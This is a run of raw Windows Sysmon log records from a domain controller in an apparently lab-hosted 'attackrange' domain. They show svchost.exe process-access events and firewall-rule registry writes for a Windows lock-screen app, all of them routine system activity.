13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.399{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|M=microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.AssignedAccessLockApp_1000
.14393.2068.0_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.399{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4C5DBECA-01A7-40A3-ADB1-745434940551}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 13241300x800000000000000010955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.383{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F26CD381-EF9B-4B2D-A383-C789FD8FFC4A}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 10341000x800000000000000010954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
